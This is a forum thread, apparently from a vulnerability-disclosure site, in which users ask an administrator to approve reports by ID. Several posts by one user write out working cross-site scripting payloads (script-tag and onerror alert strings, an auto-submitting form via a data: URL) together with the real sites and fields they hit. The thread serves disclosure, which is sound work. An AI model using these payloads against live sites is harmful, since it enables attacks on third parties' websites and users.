Manual Approval Thread

Questions or requests about submissions
gabrielbc2013
Posts:3
Joined:Tue Dec 22, 2020 4:32 pm
Re: Manual Approval Thread

Post by gabrielbc2013 » Sun Mar 07, 2021 12:04 pm

Hello administrator, how are you?

Can you approve this report?

ID: 1942173

Thank you very much for your attention!

User avatar
x1admin
Site Admin
Posts:3101
Joined:Sun Nov 15, 2015 7:04 pm

Re: Manual Approval Thread

Post by x1admin » Tue Mar 09, 2021 4:01 am

approved

amlnspqr
Posts:291
Joined:Thu Feb 18, 2016 3:29 pm

Re: Manual Approval Thread

Post by amlnspqr » Tue Mar 09, 2021 2:02 pm

1939986 - click the fb button

JonLaing4
Posts:23
Joined:Wed Sep 30, 2020 9:40 am

Re: Manual Approval Thread

Post by JonLaing4 » Tue Mar 09, 2021 3:20 pm

Hello, please approve ID 1945783
Visiting the url https://www.pap.fr/bailleur/calcul-revi ... NBUGBOUNTY') &jour_signature=1&loyer=&mois_signature=1&submit=1 and then clicking in the box marked as 'Votre E-mail :' will trigger XSS as per screenshot.
Attachments
Screenshot from 2021-03-09 15-18-36.png
Screenshot from 2021-03-09 15-18-36.png (73.14KiB)Viewed 1994 times

JonLaing4
Posts:23
Joined:Wed Sep 30, 2020 9:40 am

Re: Manual Approval Thread

Post by JonLaing4 » Wed Mar 10, 2021 12:32 pm

Hello, please the following ID's:
1946361 The payload '-->"></script><script>alert(1)</script>"> can be entered into the search box on the url https://jobs.world.edu/ and you will get the following xss triggered.
Screenshot from 2021-03-10 12-30-36.png
Screenshot from 2021-03-10 12-30-36.png (75.44KiB)Viewed 1960 times
1946360 The payload '">><marquee><img src=x onerror=confirm(1)></marquee>"> can be entered into the Ask Questions fields and after selecting a category and pressing the 'Ask' button the xss will be triggered
Screenshot from 2021-03-10 12-31-56.png
Screenshot from 2021-03-10 12-31-56.png (54.55KiB)Viewed 1960 times
Screenshot from 2021-03-10 12-32-13.png
Screenshot from 2021-03-10 12-32-13.png (50.42KiB)Viewed 1960 times
Many thanks,

JonLaing4
Posts:23
Joined:Wed Sep 30, 2020 9:40 am

Re: Manual Approval Thread

Post by JonLaing4 » Wed Mar 10, 2021 4:19 pm

Hello please approve ID 1946511.
You can get xss with following data:
data:text/html,<!-- --><form method='POST' action='http%3A%2F%2Fwww.gongol.net%2Fcgi-sys%2Fformmail.pl'><input name='email' value='speedinquiries%40gongol.net'><input name='env_report' value='REMOTE_HOST'><input name='recipient' value='internetsales%40gongol.net'><input name='redirect' value='http%3A%2F%2Fwww.gongol.net%2F'><input name='reply%20email' value=''><input name='required' value='%26lt%3Bimg%20src%3Dx%20onerror%3Dalert%28%29%20'><input name='send%20this%20person%20an%20e-mail%20telling%20them%20where%20to%20find' value=''><input name='subject' value='Speed%20request%20for%20information'></form><script>document.forms[0].submit()</script>

When page automatically refreshes you get the xss triggered:
Screenshot from 2021-03-10 15-54-52.png
Screenshot from 2021-03-10 15-54-52.png (27.35KiB)Viewed 1951 times
This is a problem with the formmail.py configuration with the site.

JonLaing4
Posts:23
Joined:Wed Sep 30, 2020 9:40 am

Re: Manual Approval Thread

Post by JonLaing4 » Thu Mar 11, 2021 1:42 pm

Hello,
Please approve ID 1947591.
You can add the payload </script><script>alert(1)</script>"> into the search fields and it will trigger xss.
Screenshot from 2021-03-11 13-42-53.png
Screenshot from 2021-03-11 13-42-53.png (8.49KiB)Viewed 1905 times
Screenshot from 2021-03-11 13-43-04.png
Screenshot from 2021-03-11 13-43-04.png (53.11KiB)Viewed 1905 times
Many thanks

dtulupov
Posts:28
Joined:Thu Dec 17, 2015 10:55 am

Re: Manual Approval Thread

Post by dtulupov » Fri Mar 12, 2021 8:10 am

Hello, please (Improper Access Control (IAC):
1947620
1947623
1947624
1947625
1947626
1947638
1947641

User avatar
PC_Mechanic
Posts:31
Joined:Sat Mar 21, 2020 6:33 pm

Re: Manual Approval Thread

Post by PC_Mechanic » Sun Mar 14, 2021 4:51 pm

Hi Admin

Please approve 1922509

This is 100% reproduceable

User avatar
x1admin
Site Admin
Posts:3101
Joined:Sun Nov 15, 2015 7:04 pm

Re: Manual Approval Thread

Post by x1admin » Mon Mar 15, 2021 6:37 am

approved

Post Reply

Who is online

Users browsing this forum: No registered users and 2 guests